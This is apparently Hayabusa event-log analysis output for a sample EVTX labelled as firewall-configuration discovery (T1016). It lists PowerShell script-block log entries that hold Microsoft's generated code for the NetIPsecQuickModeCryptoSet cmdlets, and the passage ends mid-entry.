$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4104,info,,PwSh 
Scriptblock Log,"function Get-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { 
$__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 
'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 
[Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 
'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { 
try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
